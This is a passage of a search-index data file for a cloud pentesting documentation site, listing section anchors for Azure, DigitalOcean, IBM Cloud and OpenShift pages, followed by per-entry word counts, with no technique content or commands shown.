staction--microsoftwebsitesstartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#az---mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread--microsoftdbformysqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbformysqlflexibleserversadministratorswrite--microsoftdbformysqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#az---postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbforpostgresqlflexibleserversadministratorswrite--microsoftdbforpostgresqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#az---queue-storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#queue","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#action-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#reference","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#az---service-bus-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#service-bus","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#slanje-poruka-akcija-microsoftservicebusnamespacesauthorizationruleslistkeysaction-ili-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#prijem-poruka-akcija-microsoftservicebusnamespacesauthorizationruleslistkeysaction-ili-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationrulesread--microsoftservicebusnamespacesauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#reference","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#az---static-web-apps-post-exploitation","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#azure-static-web-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitessnippetswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#overwrite-file---overwrite-routes-html-js","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesresetapikeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitescreateuserinvitationaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#pull-requests","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#az---storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#blobs-specifične-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsblobservicescontainersimmutabilitypolicieswrite--microsoftstoragestorageaccountsblobservicescontainersimmutabilitypoliciesdelete","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#file-shares-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicestakeownershipaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesmodifypermissionsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesactassuperuseraction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocaluserswrite-microsoftstoragestorageaccountslocalusersread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocalusersregeneratepasswordaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsrestoreblobrangesaction-microsoftstoragestorageaccountsblobservicescontainersread-microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicessharesrestoreaction--microsoftstoragestorageaccountsread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#ostale-zanimljive-dozvole-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#reference","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#az---sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversread--microsoftsqlserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversipv6firewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversadministratorswrite--microsoftsqlserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversazureadonlyauthenticationswrite--microsoftsqlserversazureadonlyauthenticationsread","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#az---virtual-machines--network-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#vms--network","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputediskswrite-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputevirtualmachineswrite-microsoftcomputegalleriesapplicationswrite-microsoftcomputegalleriesapplicationsversionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesruncommandaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginasadminaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftresourcesdeploymentswrite-microsoftnetworkvirtualnetworkswrite-microsoftnetworknetworksecuritygroupswrite-microsoftnetworknetworksecuritygroupsjoinaction-microsoftnetworkpublicipaddresseswrite-microsoftnetworkpublicipaddressesjoinaction-microsoftnetworknetworkinterfaceswrite-microsoftcomputevirtualmachineswrite-microsoftnetworkvirtualnetworkssubnetsjoinaction-microsoftnetworknetworkinterfacesjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#todo-microsoftcomputevirtualmachineswacloginasadminaction","pentesting-cloud/azure-security/az-persistence/index.html#az---persistence","pentesting-cloud/azure-security/az-persistence/index.html#oauth-application","pentesting-cloud/azure-security/az-persistence/index.html#applications-and-service-principals","pentesting-cloud/azure-security/az-persistence/index.html#federation---token-signing-certificate","pentesting-cloud/azure-security/az-persistence/index.html#federation---trusted-domain","pentesting-cloud/azure-security/az-persistence/index.html#reference","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#az---cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#az---queue-storage-persistence","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#queue","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#reference","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#az---vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#vms-persistencija","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-vm-aplikacije-vm-ekstenzije-i-slike","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-instance","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#az---storage-persistence","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#storage-privesc","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#uobičajene-trikove","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsblobservicescontainersupdate--microsoftstoragestorageaccountsblobservicesdeletepolicywrite","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-device-registration.html#az---device-registration","pentesting-cloud/azure-security/az-device-registration.html#osnovne-informacije","pentesting-cloud/azure-security/az-device-registration.html#tpm---trusted-platform-module","pentesting-cloud/azure-security/az-device-registration.html#registracija-uređaja-sa-sso-tokenima","pentesting-cloud/azure-security/az-device-registration.html#prepisivanje-uređajnog-tiketa","pentesting-cloud/azure-security/az-device-registration.html#prepisivanje-whfb-ključa","pentesting-cloud/azure-security/az-device-registration.html#references","pentesting-cloud/digital-ocean-pentesting/index.html#digital-ocean-pentesting","pentesting-cloud/digital-ocean-pentesting/index.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/index.html#osnovna-enumeracija","pentesting-cloud/digital-ocean-pentesting/index.html#ssrf","pentesting-cloud/digital-ocean-pentesting/index.html#projekti","pentesting-cloud/digital-ocean-pentesting/index.html#whoami","pentesting-cloud/digital-ocean-pentesting/index.html#usluge-enumeracija","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#do---osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#glavne-razlike-u-odnosu-na-aws","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#hijerarhija","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#korisnik","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#tim","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#projekat","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#dozvole","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#tim-1","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#uloge","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#pristup","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#korisničko-ime--lozinka-mfa","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#api-ključevi","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#ključevi-za-pristup-spaces","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#oauth-aplikacija","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#ssh-ključevi","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#token-za-autentifikaciju-funkcija","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#logovi","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#logovi-korisnika","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#logovi-tima","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#reference","pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.html#do---dozvole-za-pentest","pentesting-cloud/digital-ocean-pentesting/do-services/index.html#do---usluge","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#do---apps","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#rce--encrypted-env-vars","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#do---container-registry","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#povezivanje","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#do---baze-podataka","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#detalji-o-konekcijama","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#do---droplets","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#autentifikacija","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#rce","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#do---funkcije","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#okidači","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#do---images","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#do---kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#digitalocean-kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#povezivanje","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#do---mrežno","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#domeni","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#rezervisane-ip-adrese","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#balansiranje-opterećenja","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#vpc","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#do---projekti","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#do---spaces","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#pristup","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#enumeracija","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#do---volumes","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#osnovne-informacije","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#enumeracija","pentesting-cloud/ibm-cloud-pentesting/index.html#ibm-cloud-pentesting","pentesting-cloud/ibm-cloud-pentesting/index.html#ibm-cloud-pentesting-1","pentesting-cloud/ibm-cloud-pentesting/index.html#Šta-je-ibm-cloud-by-chatgpt","pentesting-cloud/ibm-cloud-pentesting/index.html#ssrf","pentesting-cloud/ibm-cloud-pentesting/index.html#reference","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#ibm---hyper-protect-crypto-services","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#osnovne-informacije","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#Šta-je-hardverski-bezbednosni-modul","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#ibm---hyper-protect-virtual-server","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#osnovne-informacije","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#metapodaci-i-vpc","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#ibm-z-i-linuxone","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#linuxone-vs-x64","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#ibm---osnovne-informacije","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#hijerarhija","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#iam","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#korisnici","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#pouzdani-profili","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#servisni-id-ovi","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#provajderi-identiteta","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#pristupne-grupe","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#uloge","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#pristupne-politike","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#reference","pentesting-cloud/openshift-pentesting/index.html#openshift-pentesting","pentesting-cloud/openshift-pentesting/index.html#osnovne-informacije","pentesting-cloud/openshift-pentesting/index.html#ograničenja-bezbednosnog-konteksta","pentesting-cloud/openshift-pentesting/index.html#eskalacija-privilegija","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#openshift---osnovne-informacije","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#kubernetes-prethodno-b-azično-znanje","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#openshift---osnovne-informacije-1","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#uvod","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#openshift---ograničenja-bezbednosnog-konteksta","pentesting-cloud/openshift-pentesting/openshift-scc.html#openshift---scc","pentesting-cloud/openshift-pentesting/openshift-scc.html#definicija","pentesting-cloud/openshift-pentesting/openshift-scc.html#lista-scc","pentesting-cloud/openshift-pentesting/openshift-scc.html#koristite-scc","pentesting-cloud/openshift-pentesting/openshift-scc.html#scc-bypass","pentesting-cloud/openshift-pentesting/openshift-scc.html#references","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#openshift---jenkins","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#odricanje-od-odgovornosti","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#preduslovi","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#kako-to-funkcioniše","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#izgradnje","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#pokretanje-izgradnje","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#jenkins-build-pod-yaml-override","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.html#jenkins-u-openshift-u---prepravke-build-pod-a","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.html#kubernetes-plugin-za-jenkins","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.html#osnovna-funkcionalnost","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.html#neka-zloupotrebe-koriste-pod-yaml-override","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.html#idemo-dalje","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.html#mogući-privescpivoting-scenariji","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/index.html#openshift---eskalacija-privilegija","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/index.html#nedostajući-servisni-nalog","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/index.html#tekton","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/index.html#scc-zaobilaženje","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.html#openshift---nedostajući-servisni-nalog","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.html#nedostajući-servisni-nalog","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.html#alati","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.html#openshift---tekton","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.html#Šta-je-tekton","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.html#mogućnosti-servisnog-naloga-pipeline","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.html#problemi-sa-konfiguracijom","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.html#rešenje","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#openshift---scc-bypass","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#privilegovani-namespaces","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#namespace-label","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#dodaj-oznaku","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#prilagođene-oznake","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#nabrojite-sve-privilegovane-imenske-prostore","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#napredni-eksploat","pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.html#reference"],"index":{"documentStore":{"docInfo":{"0":{"body":62,"breadcrumbs":4,"title":2},"1":{"body":56,"breadcrumbs":6,"title":4},"10":{"body":97,"breadcrumbs":6,"title":3},"100":{"body":46,"breadcrumbs":6,"title":1},"1000":{"body":57,"breadcrumbs":12,"title":4},"1001":{"body":3,"breadcrumbs":9,"title":1},"1002":{"body":169,"breadcrumbs":15,"title":7},"1003":{"body":57,"breadcrumbs":11,"title":3},"1004":{"body":0,"breadcrumbs":9,"title":1},"1005":{"body":70,"breadcrumbs":9,"title":1},"1006":{"body":27,"breadcrumbs":9,"title":1},"1007":{"body":26,"breadcrumbs":9,"title":1},"1008":{"body":60,"breadcrumbs":9,"title":1},"1009":{"body":57,"breadcrumbs":11,"title":3},"101":{"body":153,"breadcrumbs":7,"title":2},"1010":{"body":13,"breadcrumbs":9,"title":1},"1011":{"body":57,"breadcrumbs":10,"title":2},"1012":{"body":62,"breadcrumbs":10,"title":2},"1013":{"body":81,"breadcrumbs":9,"title":1},"1014":{"body":106,"breadcrumbs":9,"title":1},"1015":{"body":65,"breadcrumbs":9,"title":1},"1016":{"body":77,"breadcrumbs":9,"title":1},"1017":{"body":79,"breadcrumbs":9,"title":1},"1018":{"body":109,"breadcrumbs":9,"title":1},"1019":{"body":142,"breadcrumbs":9,"title":1},"102":{"body":71,"breadcrumbs":7,"title":2},"1020":{"body":60,"breadcrumbs":9,"title":1},"1021":{"body":57,"breadcrumbs":11,"title":3},"1022":{"body":21,"breadcrumbs":9,"title":1},"1023":{"body":26,"breadcrumbs":9,"title":1},"1024":{"body":33,"breadcrumbs":9,"title":1},"1025":{"body":308,"breadcrumbs":9,"title":1},"1026":{"body":57,"breadcrumbs":11,"title":3},"1027":{"body":0,"breadcrumbs":9,"title":1},"1028":{"body":92,"breadcrumbs":9,"title":1},"1029":{"body":61,"breadcrumbs":9,"title":1},"103":{"body":121,"breadcrumbs":8,"title":3},"1030":{"body":57,"breadcrumbs":11,"title":3},"1031":{"body":7,"breadcrumbs":9,"title":1},"1032":{"body":22,"breadcrumbs":9,"title":1},"1033":{"body":4,"breadcrumbs":9,"title":1},"1034":{"body":15,"breadcrumbs":9,"title":1},"1035":{"body":11,"breadcrumbs":9,"title":1},"1036":{"body":4,"breadcrumbs":9,"title":1},"1037":{"body":60,"breadcrumbs":9,"title":1},"1038":{"body":57,"breadcrumbs":11,"title":3},"1039":{"body":0,"breadcrumbs":9,"title":1},"104":{"body":88,"breadcrumbs":8,"title":3},"1040":{"body":25,"breadcrumbs":9,"title":1},"1041":{"body":25,"breadcrumbs":9,"title":1},"1042":{"body":78,"breadcrumbs":9,"title":1},"1043":{"body":57,"breadcrumbs":11,"title":3},"1044":{"body":11,"breadcrumbs":10,"title":2},"1045":{"body":63,"breadcrumbs":11,"title":3},"1046":{"body":55,"breadcrumbs":10,"title":2},"1047":{"body":7,"breadcrumbs":9,"title":1},"1048":{"body":39,"breadcrumbs":11,"title":3},"1049":{"body":34,"breadcrumbs":9,"title":1},"105":{"body":313,"breadcrumbs":7,"title":2},"1050":{"body":7,"breadcrumbs":9,"title":1},"1051":{"body":40,"breadcrumbs":11,"title":3},"1052":{"body":60,"breadcrumbs":9,"title":1},"1053":{"body":57,"breadcrumbs":11,"title":3},"1054":{"body":9,"breadcrumbs":9,"title":1},"1055":{"body":56,"breadcrumbs":9,"title":1},"1056":{"body":78,"breadcrumbs":9,"title":1},"1057":{"body":57,"breadcrumbs":11,"title":3},"1058":{"body":79,"breadcrumbs":9,"title":1},"1059":{"body":22,"breadcrumbs":9,"title":1},"106":{"body":90,"breadcrumbs":6,"title":1},"1060":{"body":29,"breadcrumbs":9,"title":1},"1061":{"body":37,"breadcrumbs":10,"title":2},"1062":{"body":81,"breadcrumbs":9,"title":1},"1063":{"body":57,"breadcrumbs":11,"title":3},"1064":{"body":11,"breadcrumbs":10,"title":2},"1065":{"body":18,"breadcrumbs":9,"title":1},"1066":{"body":61,"breadcrumbs":9,"title":1},"1067":{"body":11,"breadcrumbs":9,"title":1},"1068":{"body":26,"breadcrumbs":10,"title":2},"1069":{"body":44,"breadcrumbs":11,"title":3},"107":{"body":57,"breadcrumbs":4,"title":2},"1070":{"body":69,"breadcrumbs":10,"title":2},"1071":{"body":104,"breadcrumbs":9,"title":1},"1072":{"body":57,"breadcrumbs":11,"title":3},"1073":{"body":5,"breadcrumbs":9,"title":1},"1074":{"body":86,"breadcrumbs":9,"title":1},"1075":{"body":14,"breadcrumbs":9,"title":1},"1076":{"body":17,"breadcrumbs":9,"title":1},"1077":{"body":179,"breadcrumbs":9,"title":1},"1078":{"body":56,"breadcrumbs":15,"title":7},"1079":{"body":93,"breadcrumbs":9,"title":1},"108":{"body":17,"breadcrumbs":5,"title":3},"1080":{"body":53,"breadcrumbs":10,"title":2},"1081":{"body":256,"breadcrumbs":10,"title":2},"1082":{"body":66,"breadcrumbs":9,"title":1},"1083":{"body":62,"breadcrumbs":9,"title":1},"1084":{"body":57,"breadcrumbs":11,"title":3},"1085":{"body":5,"breadcrumbs":9,"title":1},"1086":{"body":196,"breadcrumbs":13,"title":5},"1087":{"body":120,"breadcrumbs":12,"title":4},"1088":{"body":68,"breadcrumbs":9,"title":1},"1089":{"body":57,"breadcrumbs":13,"title":4},"109":{"body":3,"breadcrumbs":4,"title":2},"1090":{"body":0,"breadcrumbs":12,"title":3},"1091":{"body":77,"breadcrumbs":10,"title":1},"1092":{"body":41,"breadcrumbs":11,"title":2},"1093":{"body":82,"breadcrumbs":10,"title":1},"1094":{"body":57,"breadcrumbs":13,"title":4},"1095":{"body":29,"breadcrumbs":11,"title":2},"1096":{"body":187,"breadcrumbs":11,"title":2},"1097":{"body":182,"breadcrumbs":11,"title":2},"1098":{"body":62,"breadcrumbs":10,"title":1},"1099":{"body":107,"breadcrumbs":17,"title":6},"11":{"body":250,"breadcrumbs":7,"title":4},"110":{"body":45,"breadcrumbs":3